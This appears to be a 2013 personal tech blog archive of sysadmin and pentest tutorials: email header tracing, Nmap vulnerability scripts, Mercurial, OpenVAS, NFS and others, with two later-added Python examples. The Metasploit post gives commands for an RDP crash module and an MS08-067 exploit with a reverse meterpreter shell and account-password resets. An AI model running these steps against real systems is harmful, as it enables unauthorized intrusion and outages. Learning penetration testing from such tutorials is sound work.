Wednesday, July 24, 2013

How to Find Email Address Source?



You probably receive a lot of email from friends. In this tutorial we will learn how to find where an email you received actually came from, so that you can tell a genuine message from a spoofed one. Attackers can easily send email with a forged From address using websites such as "emkei.cz".

Steps:
1. Select the email that you want to trace.
2. Get its full headers. In Gmail, for example, click the "More" button next to the "Reply" button and choose "Show original".
3. Copy the complete header block, from the top of the message down to the To: field.
4. Open "http://whatismyipaddress.com/trace-email" and paste the headers into the headers text area.
5. Click the "Get Source" button to obtain the IP address of the source.
6. Use a WhoIs service (http://whois.net/) to get more information about that IP address: paste the address found in step 5 and click the "Go" button to see who the address is registered to.

Caveat: the "source" found this way is the IP address in the earliest (bottom-most) Received: header, and everything below the Received: line added by your own mail provider was written by the sender's systems, so a spoofer can forge it. Each mail server prepends its own Received: header, so read the chain from the top: the first hop added by your provider that names an outside server tells you which machine actually handed the message to your provider, and that is as far back as the chain can be trusted. If your provider adds an Authentication-Results: header, also check the SPF and DKIM results in it; a message that fails both for the claimed From domain should not be trusted whatever the Received: chain says.
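The tracing steps above, done by hand, as an added example that is not code from this post or from the tracing websites it mentions. It reads the Received: chain the way the "trace email" step does, but stops trusting the chain once it leaves servers you control, and pulls out the SPF/DKIM verdicts if your provider recorded them. The hostnames (mail.example.net, mx1.example.net), the addresses and the message itself are constructed for the example.

```python
"""Trace a message to the outside machine that handed it to your own mail servers."""
import email
import ipaddress
import re

# Each server prepends its own Received: line, so the first one in the message
# is the newest hop.  A line reads roughly "from <host> (<comment> [<ip>]) by <host> ...".
RECEIVED_RE = re.compile(r"from\s+(\S+)(?:\s+\(([^)]*)\))?.*?\bby\s+(\S+)", re.I)
BRACKET_IP_RE = re.compile(r"\[(?:IPv6:)?([0-9A-Fa-f:.]+)\]")

# Our own MX and mail store (assumed names); only hops they added are trusted.
TRUSTED_HOSTS = {"mail.example.net", "mx1.example.net"}

# Constructed message: the first two Received: lines were written by our own
# servers; the third was written on the sender's side and could say anything.
SAMPLE = """\
Received: from mx1.example.net (mx1.example.net [192.0.2.10])
        by mail.example.net with ESMTP id k3Ab9; Wed, 24 Jul 2013 10:00:02 +0000
Authentication-Results: mx1.example.net; spf=pass smtp.mailfrom=sender.example; dkim=none
Received: from smtp.sender.example (smtp.sender.example [203.0.113.5])
        by mx1.example.net with ESMTPS id x7Qz1; Wed, 24 Jul 2013 10:00:00 +0000
Received: from [10.0.0.7] (unknown [198.51.100.23])
        by smtp.sender.example with ESMTPA; Wed, 24 Jul 2013 09:59:55 +0000
From: Friend <friend@sender.example>
To: alice@example.net
Subject: hello

constructed sample body
"""


def parse_received(value):
    """Return {'from', 'ip', 'by'} for one Received: value, or None if unparseable."""
    flat = " ".join(value.split())          # undo header folding
    m = RECEIVED_RE.match(flat)
    if not m:
        return None
    from_host, comment, by_host = m.group(1), m.group(2) or "", m.group(3)
    ip = None
    for text in (comment, from_host):       # prefer the IP the receiving server logged
        hit = BRACKET_IP_RE.search(text)
        if hit:
            try:
                ip = str(ipaddress.ip_address(hit.group(1)))
                break
            except ValueError:
                continue
    return {"from": from_host.lower().rstrip("."), "ip": ip,
            "by": by_host.lower().rstrip(".")}


def naive_origin(raw_message):
    """What a simple 'trace email' tool reports: the IP in the bottom-most hop."""
    msg = email.message_from_string(raw_message)
    for value in reversed(msg.get_all("Received", [])):
        hop = parse_received(value)
        if hop and hop["ip"]:
            return hop["ip"]
    return None


def trusted_origin(raw_message, trusted_hosts):
    """Walk hops newest-first while our own servers added them and return the
    first outside peer's IP.  Everything below that hop is the sender's word."""
    msg = email.message_from_string(raw_message)
    for value in msg.get_all("Received", []):
        hop = parse_received(value)
        if hop is None:
            continue
        if hop["by"] not in trusted_hosts:
            return None         # chain left our servers without an outside hop
        if hop["from"] not in trusted_hosts:
            return hop["ip"]
    return None


def auth_results(raw_message):
    """spf/dkim/dmarc verdicts from Authentication-Results:, if the provider adds one."""
    msg = email.message_from_string(raw_message)
    verdicts = {}
    for value in msg.get_all("Authentication-Results", []):
        for method, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", value, re.I):
            verdicts.setdefault(method.lower(), result.lower())
    return verdicts


if __name__ == "__main__":
    print("bottom-most hop (forgeable):        ", naive_origin(SAMPLE))
    print("first outside peer seen by our MX:  ", trusted_origin(SAMPLE, TRUSTED_HOSTS))
    print("authentication verdicts:            ", auth_results(SAMPLE))
```

On the constructed message the naive walk blames 198.51.100.23, a host inside the sender's network whose Received: line you cannot verify, while the trusted walk stops at 203.0.113.5, the server that actually connected to mx1.example.net. That is the address worth looking up in WhoIs.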

Friday, July 19, 2013

Nmap usage to perform Vulnerability Assessments

The NSE Documentation Portal [http://nmap.org/nsedoc/] provides a detailed guide to nmap script usage.

Nmap scripts (NSE) can be used to perform basic vulnerability assessments.

In this tutorial I will show a few examples of nmap scripts.


1. "smb-check-vulns" script to check for several well-known Windows SMB/RPC vulnerabilities.

According to the script's NSE documentation it checks for:
  • MS08-067, a Windows RPC vulnerability
  • Conficker, an infection by the Conficker worm
  • Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000
  • SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
  • MS06-025, a Windows Ras RPC service vulnerability
  • MS07-029, a Windows Dns Server RPC service vulnerability
Example:
$ nmap --script smb-check-vulns.nse -p445 <targetHostIP>

Or, to also run the checks that crash a vulnerable target (in particular the regsvc and SMBv2 denial-of-service tests, which the script only attempts with unsafe=1):
$ sudo nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445 <targetHostIP>

Only use unsafe=1 against hosts you are authorized to take down: a vulnerable target will blue-screen or reboot.

Output:
Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

Note: in Nmap 7 this script was split into separate scripts (smb-vuln-ms08-067, smb-vuln-conficker, smb-vuln-regsvc-dos, smb-vuln-cve2009-3103, smb-vuln-ms06-025, smb-vuln-ms07-029); on a current Nmap use --script "smb-vuln-*" instead.


2. "nbstat" script to retrieve the target's NetBIOS names and MAC address.
By default the script displays the computer name and the logged-in user; with verbosity turned up (-v) it lists all the names the system thinks it owns. The NetBIOS name service runs over UDP port 137, hence -sU in the example.

Example:
sudo nmap -sU --script nbstat.nse -p137 10.15.10.30

Output: 
Host script results:
| nbstat:  
|   NetBIOS name: IT-FS, NetBIOS user: <unknown>, NetBIOS MAC: 1c:6f:65:91:19:96
|   Names
|     IT-FS<00>            Flags: <unique><active>
|     IT-FS<20>            Flags: <unique><active>
|     IT-DEPT<00>          Flags: <group><active>
|     IT-DEPT<1c>          Flags: <group><active>
|     IT-DEPT<1e>          Flags: <group><active>
|     IT-DEPT<1d>          Flags: <unique><active>
|     \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|_    IT-DEPT<1b>          Flags: <unique><active>


3. The default script set (-sC), which includes "upnp-info" for extracting system information from the UPnP service.

Running nmap with -sV -sC performs version detection and runs the default scripts (upnp-info, nbstat, smb-os-discovery and others) against whatever services it finds.

Example:
$ nmap -sV -sC 10.15.10.30

Output (host script results only; this is what the SMB-related default scripts returned against this host):
Host script results:
|_nbstat: NetBIOS name: IT-FS, NetBIOS user: <unknown>, NetBIOS MAC: 1c:6f:65:91:19:96
| smb-os-discovery:  
|   OS: Windows Server 2003 3790 (Windows Server 2003 5.2)
|   Name: IT-DEPT\IT-FS
|_  System time: 2013-07-19 14:41:14 UTC+5.5
|_smbv2-enabled: Server doesn't support SMBv2 protocol



Creating a patch to be checked in for Mozilla

To create a patch that others can easily check in for you (Mozilla wants git-style diffs with 8 lines of context, the function name in hunk headers and your address as the author), make the following settings on your computer.

Create a .hgrc file in your HOME directory (such as "/home/username") if it does not already exist, and add the following to it.

[ui]
username=yyyy@xxxxx.zzz

[defaults]
diff = -p -U 8
qdiff = -p -U 8
qnew = -U

[diff]
git=1
showfunc=1
unified=8

[extensions]
mq =


Save file and close it.

To generate a patch from an HG (Mercurial) repository:
$ hg diff > patchfilename

Discarding all local changes in the HG (Mercurial) repository (this throws the uncommitted work away, so save a diff first if you may want it back; hg leaves .orig copies of the reverted files unless you add --no-backup):
$ hg revert -a


Using the Mercurial Queues (mq) extension to build a patch for check-in:
# set up the patch queue directory (deprecated since Mercurial 1.5; qnew now creates it automatically)
hg qinit

# create a new patch named firstpatch
hg qnew firstpatch

# edit some files
vi filename

# update the patch to contain your changes
hg qrefresh -m "Bug XXXXX - Testing message that goes with patch"

# vi .hg/patches/firstpatch to see the result
# print the current patch to the screen
hg qdiff

# make some more changes
vi filename

# see the differences not yet stored in the patch
hg diff

# update the patch
hg qrefresh

# Look at the patches you have applied
# Look at all the patches in the queue
hg qapplied
hg qseries

# remove the top patch
hg qpop

# apply the patch again
hg qpush

# remove all patches
hg qpop -a

# apply all patches
hg qpush -a

# Output all applied patches as a single patch
hg diff -r qparent:qtip

# update the commit message on a patch
hg qrefresh -m "New Message"

# Convert all applied patches into permanent changesets
hg qfinish -a

Patch to Upload on Bugzilla:
It is available in the following folder location:
/your_repository_folder/.hg/patches/

Or you can use the following command to generate a patch to upload:
hg export qtip  > path_to_temp_patches/patchFileName.patch

Thursday, July 18, 2013

Metasploit Usage for Exploitation

This tutorial is very general; I will keep updating it whenever I find new exploits and the time to update this post.

1. If 3389/tcp (ms-term-serv, Remote Desktop) is open, the MS12-020 auxiliary module in Metasploit can crash an unpatched target, which reboots it and takes the RDP service down with it. This is a denial-of-service test, so only run it against a host you are authorized to knock offline. Metasploit also has auxiliary/scanner/rdp/ms12_020_check, which tests for the vulnerability without crashing the host; prefer it when you only need to know whether the patch is missing.

$ msfconsole
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > set RHOST target-IP-Address
msf  auxiliary(ms12_020_maxchannelids) > exploit

Now rescan the target computer; on a vulnerable host you will find that the ms-term-serv service no longer responds. A patched host is unaffected.

2. Exploiting an unpatched Windows XP SP2/SP3 machine (MS08-067) to get SYSTEM-level access. The exploit attacks the Server service on port 445, so 445/tcp must be open.

$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST target-IP-Address
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST your-IP-Address
msf exploit(ms08_067_netapi) > exploit
meterpreter > shell

C:\Windows\System32\> net user
C:\Windows\System32\> net user userName newPassword

The first net user command lists the local accounts; the second resets the password of userName (append /add to create a new account instead). The session runs as SYSTEM because the exploited Server service does, so these commands succeed without any further privilege escalation.





Wednesday, July 17, 2013

OpenVAS Startup script for Kali Linux


The following simple script starts openVAS on Kali Linux.

Create a file "script.sh" and copy paste following contents:

#!/bin/bash

## Script by PATIL Kailas
## Syncs the NVT feed and starts the OpenVAS services on Kali Linux.
## Run it as root: the feed sync and the init scripts need it.

if [ "$(id -u)" -ne 0 ]; then
    echo "Please run this script as root (sudo ./script.sh)." >&2
    exit 1
fi

echo -e "Script to run openVAS by PATIL Kailas.\n"

## Update the NVT (vulnerability test) feed
echo "Syncing NVT Database..."
openvas-nvt-sync

## The SCAP and CERT feeds are large; enable these two if you want CVE/CERT data in reports
#echo "Updating SCAP Data Feed..."
#openvas-scapdata-sync

#echo "Updating CERT Feed..."
#openvas-certdata-sync

## Start the services: the scanner first, then the manager that talks to it,
## then the administrator and the web UI that talk to the manager
echo "Starting OpenVAS Services..."

/etc/init.d/openvas-scanner start
/etc/init.d/openvas-manager start
/etc/init.d/openvas-administrator start
/etc/init.d/greenbone-security-assistant start

echo -e "Services Started!\nPlease log in via the Web UI at https://127.0.0.1:9392 and confirm the security exception (the UI uses a self-signed certificate).\nDefault username is admin and the password is the one you created during setup.\n"

echo -e "Launching WebUI\n"

gnome-open https://127.0.0.1:9392


Save the file, make it executable (chmod +x script.sh) and run it with sudo whenever you want to use openVAS.

Monday, March 11, 2013

Format a Pen Drive (PD) or USB Drive on Ubuntu from the Terminal

To format a pen drive from the terminal use the following steps:
1. Connect the pen drive to the computer and run the command below to find the device name the kernel assigned to it.

$ dmesg | tail

It will generate output like the following (here the drive is /dev/sdb and its first partition is /dev/sdb1):


[20940.808432]  sdb: sdb1
[20940.811241] sd 7:0:0:0: [sdb] Attached SCSI removable disk

Double-check the name before going further: mkfs writes to whatever device you give it, and formatting the wrong one destroys its data. "lsblk" (or "sudo fdisk -l") lists all disks with their sizes, which makes it easy to confirm that sdb is the small removable drive and not a hard disk.

2. Now unmount the pen drive (the desktop usually auto-mounts it):

$ sudo umount /dev/sdb1

3. Then enter the following command to format the partition with FAT32, giving it the label "Ubuntu":

$ sudo mkfs.vfat -n 'Ubuntu' -I /dev/sdb1

-n sets the volume label; -I lets mkfs.vfat write to a device even when it looks like a whole disk rather than a partition, so it is not needed for /dev/sdb1 but does no harm.





Tuesday, February 5, 2013

Ubuntu 12.04 fresh installation failed to install GRUB


A fresh Ubuntu 12.04 LTS installation can complete successfully and still fail to install GRUB correctly. In that situation you can install GRUB yourself from a LiveCD or bootable installation disk using the following steps (this covers a BIOS/MBR install, which is what 12.04 used on most PCs of that time).

Boot from the LiveCD, open a terminal and run the following commands to note down the drive and partition on which Ubuntu is installed.

$ sudo fdisk -l
OR
$ sudo df -h

$ sudo blkid   # gives more information on partitions and file system types

Now mount the hard disk partition on which Ubuntu is installed.
$ sudo mount /dev/sdXY /mnt
Where X is the drive letter (a, b, c, etc.) and
Y is the partition number (1, 5, 6, 8, etc.)

For example:
  sudo mount /dev/sda8 /mnt

Now install the GRUB boot loader.
$ sudo grub-install --boot-directory=/mnt/boot /dev/sdX
For example:
  sudo grub-install --boot-directory=/mnt/boot /dev/sda

--boot-directory is the folder in which GRUB's files live; on the installed system that is /boot, which is /mnt/boot while the partition is mounted there. Note that the target in the command above is the whole disk (sdX), not the partition (sdXY): GRUB's first stage goes into the disk's master boot record.

Do not run grub-install while your shell's current directory is inside /mnt (or wherever the target disk is mounted); it sometimes fails in that case, so run it from your home directory.

Tuesday, December 11, 2012

Being prompted for Password for '(null)' GNOME keyring

You can commit your project using Subversion as follows:
svn commit -m "Your comment message goes here" --username <yourusername>
You should then be prompted for your password before the commit goes through:
Password for '<yourusername>':
This is the password assigned to <yourusername> when your project was set up on the hosting service.
The first commit with svn commit works properly.
On subsequent commits, however, you may get a prompt like:

Password for '(null)' GNOME keyring:
This prompt comes from gnome-keyring, not from Subversion. More than one keyring is present on the system: every user has a default keyring, and there is another one that is only kept in memory. gnome-keyring has stored the Subversion credentials in one of these other keyrings and is asking for the password to unlock it.
If you would rather have Subversion not use the keyring at all, change its configuration in the .subversion folder in your home directory:
patilkr@patilkr-desktop:~$ cd .subversion/
patilkr@patilkr-desktop:~/.subversion$ ls
auth  config  README.txt  servers
Open the 'config' file with any text editor,
patilkr@patilkr-desktop:~/.subversion$ gedit config
In the '[auth]' section, find the commented-out 'password-stores' line, uncomment it and give it an empty value so that it reads 'password-stores = '. An empty list means no external password store (GNOME keyring, KWallet) is used.
Then save and close the config file.
Finally, open the other file named 'servers' in any text editor,
patilkr@patilkr-desktop:~/.subversion$ gedit servers
In the '[global]' section, find the line 'store-passwords = no' and uncomment it.
Then save and close the 'servers' file.

With both changes Subversion caches no passwords at all, so it will prompt for your password on every commit. That is the safe trade-off: leaving the keyring disabled but store-passwords on would instead have Subversion offer to save the password unencrypted on disk.

Wednesday, September 19, 2012

User Specified Content Security Policy


Content Security Policy is a declarative policy that restricts what content can load on a page.  Its primary purpose is to mitigate Cross-Site Scripting vulnerabilities.  The core issue exploited by Cross-Site Scripting (XSS) attacks is that web browsers cannot distinguish between content that is intended to be part of the web application and content that has been maliciously injected into it.
To address this problem, CSP defines the Content-Security-Policy HTTP header, which lets web application developers whitelist the sources of trusted content and instruct browsers to execute or render resources only from those sources.  However, it is often difficult for developers to write a comprehensive Content Security Policy for their website.  They may worry about breaking their page by blocking unanticipated but necessary content.  They may not be able to easily change the CSP header for their site, which makes it hard to experiment with policies until they find one that best protects the page without breaking site functionality.
UserCSP changes this!  A developer can now view the current policy applied to their site and create their own custom policy.  They can choose to apply their custom policy on the site, or even combine their policy with the website’s existing policy.  When combining policies, they have an option to choose from the strictest subset of the two, or the most lax subset.  They can locally test their site with the custom policy applied and tweak the policy until they have one that works.
The coolest feature of UserCSP is the Infer-CSP tab.  This feature can help a developer derive a usable and secure policy for their site.  By looking at the content the website loads, the add-on determines the strictest set of CSP rules it can apply to the site without breaking the current page.  The inferred policy is provided in the proper syntax for the CSP Header, so all a developer needs to do is start serving this policy for their site via the CSP header.
Please visit Tanvi's Blog on Mozilla for more information. 

Monday, August 27, 2012

Configure NFS on Ubuntu


Network File System (NFS) lets one machine export directories that other machines on the network can mount and use as if they were local.

In this scenario we are going to configure NFS server on 10.1.1.15 host and NFS client on 10.1.1.17 machine.

1. Prerequisites
    Install the nfs-common package on both the NFS client and the NFS server using the following command.

     $ sudo apt-get install nfs-common

Additionally we need to install an extra package on the NFS server (10.1.1.15):

    $ sudo apt-get install nfs-kernel-server

This package provides the actual NFS daemon, which listens on TCP and UDP port 2049; the portmapper (portmap, or rpcbind on newer releases) must also be running and listening on port 111.

2. Create NFS Share on NFS Server (10.1.1.15)
Create a directory to share on NFS server(10.1.1.15).

Run following command on NFS server.

   $ mkdir /home/kailas

3. Apply Access Control Rules

In our scenario we want only 10.1.1.17 to access the nfs share.

Therefore, open /etc/exports file in any text editor (such as vi, gedit, or emacs) on NFS server (10.1.1.15).

Add following line in (/etc/exports) file.

A. Read/Write Permissions

    /home/kailas/     10.1.1.17(rw,sync)

The line above exports the /home/kailas directory to the host with IP 10.1.1.17 with read and write permission, in synchronous mode (the server commits writes to disk before replying).


B. Only Read Permissions

If you don't want to give write permission and only want to give read permission to client (10.1.1.17) then instead of above line use following line.

    /home/kailas/     10.1.1.17(ro,sync)

C. Read/Write + Root privileges

  /home/kailas/    10.1.1.17(rw,sync,no_root_squash)

The line above in "/etc/exports" exports /home/kailas to the host with IP address 10.1.1.17 with read and write permission in synchronous mode, and with no_root_squash the remote root user is treated as root on the server, so it can read and change any file under the export. The default (root_squash) maps remote root to the anonymous user; only disable it when the client is fully trusted, because root on the client then becomes root over the whole exported tree.

D. Read/Write Privilege to all computers on network

 /home/kailas/     *(rw,sync)

The line above exports /home/kailas read/write to any host. NFS exports like this rely on nothing but the client's IP address, so on a network you do not fully control anyone who can reach port 2049 can mount the share and write to it; use D and E only on isolated networks.


E. Read Privilege to All computers on network

   /home/kailas/     *(ro,sync)

The line above exports /home/kailas read-only to any host; the same reachability caveat as in D applies.
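An audit of /etc/exports lines like the ones in A to E above, as an added example that is not part of the original post. It parses the exportfs line format (path, then one or more client(options) specs) and flags the entries that give away more than intended: exports to every host, no_root_squash, the insecure option, and the classic mistake of a space between the client and its options, which exportfs reads as "that client with defaults, and everyone with the options". The sample exports text below is constructed for the example.

```python
"""Audit /etc/exports for risky entries."""
import re
from typing import List, Tuple

# One client spec: "host(opt,opt)", "host" (defaults), or "(opt,opt)" (everyone).
CLIENT_RE = re.compile(r"^([^(\s]*)(?:\((.*)\))?$")

Finding = Tuple[str, str, str, str]   # (severity, path, client, message)

# Constructed sample, mirroring the variants from the sections above.
SAMPLE_EXPORTS = """\
# constructed /etc/exports
/home/kailas/     10.1.1.17(rw,sync)
/home/kailas/     10.1.1.17(rw,sync,no_root_squash)
/home/kailas/     *(rw,sync)
/srv/public       *(ro,sync)
/srv/backup       10.1.1.17 (rw)
/srv/scratch      *.lab.example(rw,insecure)
"""


def parse_exports(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (path, client, options) for every client spec on every line.
    A spec with no options gets the exportfs defaults (ro, sync, root_squash).
    Paths containing spaces (quoted in the real file) are not handled here."""
    entries: List[Tuple[str, str, List[str]]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = CLIENT_RE.match(spec)
            if not m:
                continue
            client = m.group(1)
            opts = [o.strip() for o in m.group(2).split(",")] if m.group(2) else []
            entries.append((path, client, opts))
    return entries


def audit_exports(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for path, client, opts in parse_exports(text):
        writable = "rw" in opts
        if client == "":
            # "host (rw)" with a space: the options apply to EVERY host and
            # "host" silently gets the read-only defaults.
            findings.append(("HIGH", path, client,
                             "options separated from the client by a space: they apply to all hosts"))
        elif client == "*":
            findings.append(("HIGH" if writable else "MEDIUM", path, client,
                             "exported to every host that can reach the server"))
        elif "*" in client or "?" in client:
            findings.append(("LOW", path, client,
                             "wildcard host pattern; prefer an address or CIDR range"))
        if "no_root_squash" in opts:
            findings.append(("HIGH", path, client,
                             "no_root_squash: root on the client is root on this export"))
        if "insecure" in opts:
            findings.append(("MEDIUM", path, client,
                             "insecure: requests from unprivileged source ports are accepted"))
    return findings


if __name__ == "__main__":
    for severity, path, client, message in audit_exports(SAMPLE_EXPORTS):
        print(f"{severity:6} {path:16} {client or '<everyone>':20} {message}")
```

Run it against the real file with audit_exports(open("/etc/exports").read()) after editing; the entry from section A is the only one in the sample that comes back clean.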


4. Restart the NFS daemon

Use the following command on Ubuntu to restart the NFS service.

$ sudo /etc/init.d/nfs-kernel-server restart

Note: after any modification you make to the "/etc/exports" file, re-export the shares so that your changes take effect. Restarting the service as above works; "sudo exportfs -ra" re-reads /etc/exports without interrupting clients that are already mounted.


5. Mount the NFS directory on the client (10.1.1.17) machine

The NFS client needs the portmap service; simply install the nfs-common package on the client (10.1.1.17):

   $ sudo apt-get install nfs-common


Make sure the portmap service is running:
  $ sudo service portmap status

Sample output:
  portmap start/running, process 4193

If it is not, just start it:
    $ sudo service portmap start

Create a mount directory on the client (10.1.1.17):
  $ sudo mkdir /nfs

$ sudo mount 10.1.1.15:/home/kailas /nfs/

To see the content of the directory use the following command.
 $ ls /nfs


6. Configure automount

To make this completely transparent to end users, you can mount the NFS file system automatically every time the Linux system boots. Simply edit "/etc/fstab" with your favourite editor and add a line like this:

10.1.1.15:/home/kailas   /nfs/  nfs  defaults  0  0


 7. Appendix

If the steps above do not work, check whether a firewall on the server is blocking NFS. Rather than switching the firewall off, allow the client through to the portmapper and to NFS itself; with ufw on Ubuntu:

$ sudo ufw allow from 10.1.1.17 to any port 111
$ sudo ufw allow from 10.1.1.17 to any port 2049

(mountd and the lock/status daemons use dynamically assigned ports unless you pin them in /etc/default/nfs-kernel-server, so a server-side firewall may need those opened as well.)

On Red Hat style systems the quick-and-dirty alternative is to stop iptables entirely, which is only acceptable for a test on an isolated lab network:

# service iptables stop